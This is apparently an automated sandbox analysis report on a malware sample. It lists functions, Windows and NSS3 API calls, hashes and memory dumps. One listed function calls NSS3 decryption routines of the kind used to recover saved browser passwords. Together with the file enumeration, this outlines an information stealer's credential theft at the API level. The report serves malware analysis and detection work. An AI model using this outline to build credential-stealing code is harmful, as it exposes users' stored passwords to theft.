                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5fce4db5ad075e51069615656fef1fc54b42f24f2dc63b6f480a64190571d7a2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fce4db5ad075e51069615656fef1fc54b42f24f2dc63b6f480a64190571d7a2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95
                                                                                                                                                                                                                                                                                                                                  Function 6C613E50 Relevance: 28.8, APIs: 13, Strings: 3, Instructions: 765COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C637770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>al,?,?,?,6C613E7D,?,?), ref: 6C63777C
                                                                                                                                                                                                                                                                                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C613F17
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C613F5C
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C613F8D
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C613F99
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C613FA0
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C613FA7
                                                                                                                                                                                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C613FB4
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
                                                                                                                                                                                                                                                                                                                                  • String ID: C>al$nvd3d9wrap.dll$nvinit.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1189858803-358638614
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 188e91e0ab3441ebac06793a2a27b882dfabce8fa8eb588c5cf5d77dcd7f1047
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a3de35e142da3a604f3ed5cacf9f78f510855dbfe2d9b4d0851cf0d908416adb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 188e91e0ab3441ebac06793a2a27b882dfabce8fa8eb588c5cf5d77dcd7f1047
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36521471A14B458FD714DF34C880ABB77E9AF89308F54892DD5928BB82CB74F909CB64
                                                                                                                                                                                                                                                                                                                                  Function 6C625600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2712937348
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dc85d256d6fa40f593e5d1e1fea29abefa4784976a53fc30cac6017f9c889bfd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 64ba37ac68637a1cd3114096b1dc6f4ae59c820857f686467cde4e1ea25402cb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc85d256d6fa40f593e5d1e1fea29abefa4784976a53fc30cac6017f9c889bfd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99924B71A083418FD724CF28C490B9ABBE1BFC9308F54891DE59A9B755DB34E809CF96
                                                                                                                                                                                                                                                                                                                                  Function 6C622E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C622ED3
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C622EE7
                                                                                                                                                                                                                                                                                                                                  • MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C622F0D
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C623214
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C623242
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6236BF
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: strlen$AddressCode$DescribeDetailsFormat
                                                                                                                                                                                                                                                                                                                                  • String ID: MOZ_PROFILER_SYMBOLICATE$get $set
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2257098003-3318126862
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3c03de85279720356142e8d1ee689b4b8b4d0c75f7ef6068e95006ae894188d2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2bbaf9ac8611a2166b674b50ad27c7d967be9376fb0d356d859332d621596b8c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c03de85279720356142e8d1ee689b4b8b4d0c75f7ef6068e95006ae894188d2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8325D706083818FD324CF24C4906AEBBE6AFC9318F54882DE5D987751DB35E94ACF5A
                                                                                                                                                                                                                                                                                                                                  Function 6C617E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memcpystrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: (pre-xul)$data$name$schema$vel
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3412268980-2347612338
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 70a89d2acef4b725469917207133d599f6a679d77923e29b81dc7b7afd530879
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2dee28258ce405f9d142ab598cae22243b18a40ed064ca2247ca7ee193780bb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70a89d2acef4b725469917207133d599f6a679d77923e29b81dc7b7afd530879
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3E18EB1A043408BC710CF68C84065BFBEABFD9318F558A2DE899D7790DBB0DD498B95
                                                                                                                                                                                                                                                                                                                                  Function 0040EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0040EE3E
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040F3C3
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: %s\*.*
                                                                                                                                                                                                                                                                                                                                  • API String ID: 180737720-1013718255
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dde05ea645480e0e61374d20b0f2f56761b9785ebc66a4280176b7c64ea1d6ba
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dde05ea645480e0e61374d20b0f2f56761b9785ebc66a4280176b7c64ea1d6ba
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59
                                                                                                                                                                                                                                                                                                                                  Function 6C5FD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C60D1C5), ref: 6C5FD4F2
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C60D1C5), ref: 6C5FD50B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DCFE0: EnterCriticalSection.KERNEL32(6C65E784), ref: 6C5DCFF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DCFE0: LeaveCriticalSection.KERNEL32(6C65E784), ref: 6C5DD026
                                                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C60D1C5), ref: 6C5FD52E
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65E7DC), ref: 6C5FD690
                                                                                                                                                                                                                                                                                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5FD6A6
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65E7DC), ref: 6C5FD712
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C60D1C5), ref: 6C5FD751
                                                                                                                                                                                                                                                                                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5FD7EA
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 959b063e13700530899164c9e8296891fead730d966f4d517184c7aae98a2f76
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: adab83503d4f534160065a0d6c0466094fafa7585ceb02c8e15dfb06983f35d6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 959b063e13700530899164c9e8296891fead730d966f4d517184c7aae98a2f76
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B991E671A057018FDB18CF29C89072AB7E1FB89314F65492EE56AC7B81D734E846CF86
                                                                                                                                                                                                                                                                                                                                  Function 0040C920 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C953
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0079D648), ref: 0040C971
                                                                                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                                                                                                                                                                                                                                                                                                                  • PK11_GetInternalKeySlot.NSS3 ref: 0040C98A
                                                                                                                                                                                                                                                                                                                                  • PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C9A5
                                                                                                                                                                                                                                                                                                                                  • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C9EB
                                                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                                                                                                                                                                                                                                                                                                                  • PK11_FreeSlot.NSS3(?), ref: 0040CA61
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3428224297-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95
                                                                                                                                                                                                                                                                                                                                  Function 0040DF10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040E4F2
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: 4@$\*.*
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2325840235-1993203227
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5ce60e5a34d17fac4b1a896b89d12a6e43e7815714026455dfe690dd2034fc81
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ce60e5a34d17fac4b1a896b89d12a6e43e7815714026455dfe690dd2034fc81
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A
                                                                                                                                                                                                                                                                                                                                  Function 6C5F9E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C5F9EB8
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C5F9F24
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5F9F34
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C5FA823
                                                                                                                                                                                                                                                                                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5FA83C
                                                                                                                                                                                                                                                                                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5FA849
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
